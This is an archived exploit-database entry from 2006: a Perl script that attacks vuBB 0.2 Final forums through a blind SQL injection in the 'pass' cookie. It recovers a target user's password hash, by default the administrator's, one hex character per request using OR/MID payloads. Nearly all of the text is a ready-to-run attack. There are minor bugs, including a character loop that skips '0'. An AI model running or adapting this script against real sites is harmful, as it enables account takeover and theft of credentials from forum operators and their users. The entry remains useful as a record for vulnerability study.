vuBB 0.2 Final - 'cookie' SQL Injection

EDB-ID:

1543


Platform:

PHP

Published:

2006-03-01

#!/usr/bin/perl 
print q{
----------------------------------------------------------------------

	vuBB <=0.2 Final Remote SQL Injection (cookies) Exploit
	
		exploit discovered and coded by KingOfSKa
			
			https://contropotere.netsons.org

----------------------------------------------------------------------

};

use LWP::UserAgent;

   $ua = new LWP::UserAgent;
   $ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[1]) {$ARGV[1] = '1';}

my $path = $ARGV[0] . '/index.php';
my $user = $ARGV[1];   # userid to jack
my $uname = $ARGV[2];
my $answer = "";
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
if (!$ARGV[2])
{
        print q{
		Usage:
		
		perl vubb.pl FULL_URL_TO_VBB VICTIM_USER_ID USER_NICKNAME
		perl vubb.pl http://www.somesite.com/vubb 1 administrator
		
		};
exit();

}
print "[URL:] $path\r\n";
print "[USERID:] $user\r\n";
print "[USERNAME:] $user\r\n";
print "Starting connection...\r\n";

my $j = 0 ;
for( $i=1; $i < 33; $i++ )
{
        for( $j=1; $j < 17; $j++ )
        {
	
                $current = $charset[$j];
		
  my $sql = "99%27+OR+(id%3d".$user."+AND+MID(pass,".$i.",1)%3d%27".$charset[$j]."%27)/*"; 
                my @cookie = ('Cookie' => "user=kingofska; pass=$sql;");
                my $res = $ua->get($path, @cookie);

                $answer = $res->content;
		#print $answer; #Just for debugging...
		if ($answer =~/(.*)Welcome $uname(.*)/){$outputs.= $current; print "$i/32 found...\r\n"; }
	}

 
}


if ( length($outputs) < 1 )   { print "Not Exploitable!\r\n"; exit;     }
print  "User Hash is: $outputs \r\n";
exit;

# milw0rm.com [2006-03-01]